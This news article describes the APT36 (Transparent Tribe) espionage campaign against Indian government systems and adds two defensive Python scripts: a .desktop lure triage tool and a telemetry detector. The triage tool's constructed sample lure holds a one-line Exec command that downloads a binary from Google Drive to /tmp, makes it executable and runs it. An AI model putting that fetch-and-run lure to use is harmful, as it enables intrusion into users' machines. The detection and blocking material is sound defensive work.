Saturday, November 8, 2025


Pakistan hacker group ‘Transparent Tribe’ attacks Indian government systems

Indian cybersecurity teams and private researchers have uncovered a fresh cyber-espionage campaign by the Pakistan-linked APT group known as Transparent Tribe (also tracked as APT36) targeting Indian government and defence systems. The campaign — active through 2025 — uses sophisticated phishing lures, cross-platform malware and novel delivery techniques that aim to gain long-term access to sensitive networks.

Timeline & scope

Researchers first flagged the latest wave in mid-2025 and published detailed writeups through August–October. Multiple security vendors say the attacks focused on Indian defence, administrative and education sector targets and used decoy documents themed around real-world incidents to trick government employees into opening malicious files.

How the attackers operate

This campaign shows Transparent Tribe evolving its toolkit:

  • Phishing with realistic decoys: Targeted spear-phishing emails carried weaponized attachments that looked like legitimate PDFs or government notices. The decoys used current events and official formats to increase credibility.
  • Cross-platform payloads: Attackers delivered payloads for both Windows and India’s BOSS (Bharat Operating System Solutions) Linux environment. On the Linux side the lure is a .desktop shortcut file dressed up as a document; when the user opens it, the shortcut’s launch command fetches the malware from cloud storage (notably Google Drive) and runs it.
  • New RAT family & Golang builds: Analysts observed a Golang-based DeskRAT / DeskSpy variant used for persistence, remote control and data exfiltration — a sign the group is adopting cross-platform languages to outflank defensive tools.
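The .desktop trick works because a desktop entry is plain text whose Exec= key can be any command, so a file named like a PDF with a PDF icon can silently run a shell one-liner. The script below is an added example, not code from the original article or from any vendor report, that parses a desktop entry and lists the lure traits a triage analyst would look for (document-style name or icon, an inline shell script, curl/wget, a file-sharing host, staging under /tmp or a hidden directory). The two sample entries are constructed for the example; the decoy-PDF step and the extra cloud hosts beyond Google Drive are assumptions about what such a lure typically does, not details taken from the article.

```python
import os
import re
import shlex

# Constructed sample mimicking the lure pattern (not a real sample from the campaign).
SAMPLE_LURE = """\
[Desktop Entry]
Type=Application
Name=Incident_Report_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -sL 'https://drive.google.com/uc?export=download&id=EXAMPLE' -o /tmp/.cache/svc && chmod +x /tmp/.cache/svc && /tmp/.cache/svc & xdg-open /tmp/decoy.pdf"
"""

# Constructed benign entry, the kind a real application package installs.
SAMPLE_BENIGN = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""

# Google Drive is the host named in the reporting; the others are an assumption
# (common consumer file-sharing hosts) and can be extended.
CLOUD_HOSTS = ("drive.google.com", "drive.usercontent.google.com",
               "dropbox.com", "1drv.ms", "onedrive.live.com")
SHELLS = {"sh", "bash", "dash", "zsh"}
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def parse_desktop(text):
    """Return the keys of the [Desktop Entry] group as a dict.
    Hand-parsed because configparser trips over the '%' field codes
    and unquoted values that Exec= lines carry."""
    entry, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group == "Desktop Entry" and "=" in line:
            key, _, value = line.partition("=")   # split at the first '=' only
            entry[key.strip()] = value.strip()
    return entry


def triage(text):
    """Return a list of human-readable findings; an empty list means no lure traits."""
    entry = parse_desktop(text)
    findings = []
    name = entry.get("Name", "")
    icon = entry.get("Icon", "").lower()
    exec_line = re.sub(r"%[a-zA-Z%]", "", entry.get("Exec", ""))  # drop %f/%u field codes
    try:
        argv = shlex.split(exec_line)
    except ValueError:            # unbalanced quotes: fall back to a crude split
        argv = exec_line.split()
    lowered = exec_line.lower()

    if argv and (DOC_EXT.search(name) or "pdf" in icon):
        findings.append("Name/Icon present the entry as a document but it launches a program")
    shell_launch = bool(argv) and os.path.basename(argv[0]) in SHELLS and "-c" in argv[1:3]
    if shell_launch:
        findings.append("Exec runs an inline shell script via %s -c" % os.path.basename(argv[0]))
        if entry.get("Terminal", "").lower() == "false":
            findings.append("Terminal=false keeps the script's output off screen")
    if re.search(r"\b(curl|wget)\b", lowered):
        findings.append("Exec invokes a downloader (curl/wget)")
    for host in CLOUD_HOSTS:
        if host in lowered:
            findings.append("Exec fetches from cloud host %s" % host)
    if re.search(r"chmod\s+\+x|/tmp/|/\.[\w-]+/", exec_line):
        findings.append("Exec stages and executes a file under /tmp or a hidden directory")
    return findings


if __name__ == "__main__":
    for label, sample in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, triage(sample) or "no findings")
```

Point `triage()` at the contents of any .desktop file pulled from a mail quarantine or a user’s Downloads directory; a legitimate launcher yields no findings, while the lure pattern yields several at once, which is the combination worth alerting on rather than any single trait.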

Why this campaign is notable

Transparent Tribe has a long history of targeting Indian government and military users, but current activity shows marked escalation in technique and reach:

  1. Linux targeting at scale: Targeting BOSS Linux is significant because many Indian government appliances and endpoints run locally developed or hardened Linux stacks — it expands the attacker’s footprint beyond Windows-only compromises.
  2. Cloud payload hosting: Delivering payloads via popular cloud platforms complicates detection and takedown, and leverages legitimate services to evade filters.
  3. Operational patience: Indicators point to long-term espionage goals — establishing persistence, lateral movement, and steady exfiltration rather than disruptive attacks.

What Indian authorities and agencies are doing

Public reports indicate national cybersecurity bodies and select private CERTs have been alerted and are coordinating containment and forensic measures. The Ministry of Home Affairs and defence cyber units routinely collaborate with CERT-In and industry partners to push indicators of compromise (IOCs) and mitigation guidance to government departments. Media briefings and specialist advisories have emphasised tightening email security, applying endpoint detection rules, and blocking the identified command-and-control domains.

Signs of compromise (high-priority IOCs)

Security vendors publishing technical reports have listed IOCs and tactics to watch for (examples drawn from vendor advisories):

  • Phishing emails with attachments named to mimic official notifications or incident reports.
  • .desktop shortcut files or seemingly benign files that execute scripts to download payloads from Google Drive or other cloud hosts.
  • Outbound WebSocket or other command-and-control traffic to unfamiliar domains, and unexpected Golang-built processes, particularly binaries running from /tmp or hidden directories.
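The IOC classes above only become actionable when they are correlated: a command-line download from a file-sharing host, a freshly written file being executed, a .desktop entry appearing in an autostart directory and a WebSocket connection from that same process chain. The detector below is an added example, not code from the article or from any vendor, that runs those rules over endpoint telemetry. The JSON-lines schema, field names, hostnames and process IDs are constructed for the example and are not any product’s real format; the two byte markers used to recognise a Go-linked ELF (the `.go.buildinfo` magic and the `.gopclntab` section name) are real, but the sample file bytes are a constructed stand-in, not a real dropper.

```python
import json
import re

# Constructed telemetry in a hypothetical JSON-lines schema (field names are an
# assumption, not any vendor's format). pids 4120 and 4133 play out the chain the
# reporting describes; pid 4200 is a user legitimately opening Drive in a browser.
SAMPLE_EVENTS = """\
{"ts":"2025-10-02T09:14:03Z","event":"process","pid":4120,"exe":"/usr/bin/bash","parent_exe":"/usr/bin/nautilus","cmdline":"bash -c curl -sL https://drive.google.com/uc?export=download&id=EXAMPLE -o /tmp/.cache/svc"}
{"ts":"2025-10-02T09:14:05Z","event":"file_write","pid":4120,"path":"/tmp/.cache/svc"}
{"ts":"2025-10-02T09:14:06Z","event":"process","pid":4133,"exe":"/tmp/.cache/svc","parent_exe":"/usr/bin/bash","cmdline":"/tmp/.cache/svc"}
{"ts":"2025-10-02T09:14:07Z","event":"file_write","pid":4133,"path":"/home/user/.config/autostart/system-update.desktop"}
{"ts":"2025-10-02T09:14:09Z","event":"http","pid":4133,"dst_host":"updates.example.invalid","headers":{"Upgrade":"websocket"}}
{"ts":"2025-10-02T09:20:00Z","event":"process","pid":4200,"exe":"/usr/bin/firefox","parent_exe":"/usr/bin/nautilus","cmdline":"firefox https://drive.google.com/file/d/EXAMPLE"}
{"ts":"2025-10-02T09:20:30Z","event":"http","pid":4200,"dst_host":"meet.google.com","headers":{"Upgrade":"websocket"}}
"""

# Constructed stand-in for the dropped binary: a Go-linked ELF really does carry
# the .go.buildinfo magic and a .gopclntab section, which is what we key on.
SAMPLE_FILE_BYTES = {
    "/tmp/.cache/svc": b"\x7fELF" + b"\x00" * 60 + b".gopclntab\x00" + b"\xff Go buildinf:" + b"\x08\x00",
}

CLOUD_HOSTS = ("drive.google.com", "drive.usercontent.google.com", "dropbox.com", "1drv.ms")
WS_ALLOWLIST = {"meet.google.com"}          # assumption: whatever your organisation sanctions
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
STAGING = re.compile(r"^(/tmp/|/var/tmp/|/dev/shm/|/home/[^/]+/\.)")
AUTOSTART = re.compile(r"(^/etc/xdg/autostart/|/\.config/autostart/).*\.desktop$")
GO_MARKERS = (b"\xff Go buildinf:", b".gopclntab")


def looks_go_built(blob):
    """True if the bytes carry the markers a Go linker leaves in an ELF."""
    return any(marker in blob for marker in GO_MARKERS)


def detect(lines, file_bytes=None):
    """Run the rules over JSON-lines telemetry and return (pid, rule, detail) tuples.
    State is kept across events so a drop, its execution, its persistence and its
    beacon are tied back to the same process chain."""
    file_bytes = file_bytes or {}
    flagged = set()       # pids already implicated by an earlier rule
    written_by = {}       # path -> pid that wrote it
    hits = []

    def flag(pid, rule, detail):
        flagged.add(pid)
        hits.append((pid, rule, detail))

    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        pid, kind = ev["pid"], ev["event"]
        if kind == "process":
            cmd = ev.get("cmdline", "").lower()
            cloud = next((h for h in CLOUD_HOSTS if h in cmd), None)
            if DOWNLOADER.search(cmd) and cloud:       # curl/wget, not a browser
                flag(pid, "cloud_fetch_cli", "command-line download from %s" % cloud)
            exe = ev["exe"]
            if STAGING.match(exe) or exe in written_by:
                note = "executes file staged at %s" % exe
                if exe in written_by:
                    note += " (written by pid %d)" % written_by[exe]
                if looks_go_built(file_bytes.get(exe, b"")):
                    note += ", Go-built"
                flag(pid, "staged_exec", note)
        elif kind == "file_write":
            path = ev["path"]
            written_by[path] = pid
            if AUTOSTART.search(path):
                flag(pid, "autostart_persist", ".desktop dropped at %s" % path)
        elif kind == "http":
            host = ev.get("dst_host", "")
            upgrade = ev.get("headers", {}).get("Upgrade", "").lower()
            if upgrade == "websocket" and host not in WS_ALLOWLIST:
                suffix = " from an already-flagged pid" if pid in flagged else ""
                flag(pid, "websocket_c2", "WebSocket to %s%s" % (host, suffix))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS, SAMPLE_FILE_BYTES):
        print(hit)
```

The browser session to Google Drive and the allowlisted WebSocket endpoint produce nothing, so the rules key on how and from where the cloud host is reached rather than on the host alone; the WebSocket allowlist is the piece that needs tuning per environment, since many legitimate applications use WebSockets.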

Practical steps for defenders

For IT teams in government and critical infrastructure, recommended immediate actions include:

  • Enforce strict email attachment policies; block .desktop and unknown executable attachments at the gateway, and inspect inside archives, since a filter that only looks at the top-level attachment misses a shortcut nested in a zip.
  • Deploy or tune endpoint detection to flag uncommon processes (Golang binaries, especially ones running from /tmp or hidden directories) and unexpected persistence mechanisms such as new .desktop entries in autostart directories.
  • Ensure patching, multi-factor authentication, and least-privilege for sensitive systems; rotate credentials if intrusion is suspected.
  • Share IOCs across agencies and use threat-intelligence feeds to update firewalls and proxy rules.

Wider implications

This campaign underlines a larger trend: state-aligned APT groups are increasingly building cross-platform tools, abusing cloud hosting services, and tailoring lures to local languages and events. For India, the rising tempo of such espionage efforts reinforces the need for better cyber-hygiene at the departmental level, improved public-sector incident response capabilities, and stronger collaboration with private security researchers.

Bottom line

The Transparent Tribe attack against Indian government systems is a reminder that cyber-espionage remains a persistent, adaptive threat. Organisations must assume targeted phishing will continue and that attackers will keep innovating — defenders need rapid threat intelligence sharing, hardened endpoints, and user awareness to reduce risk.
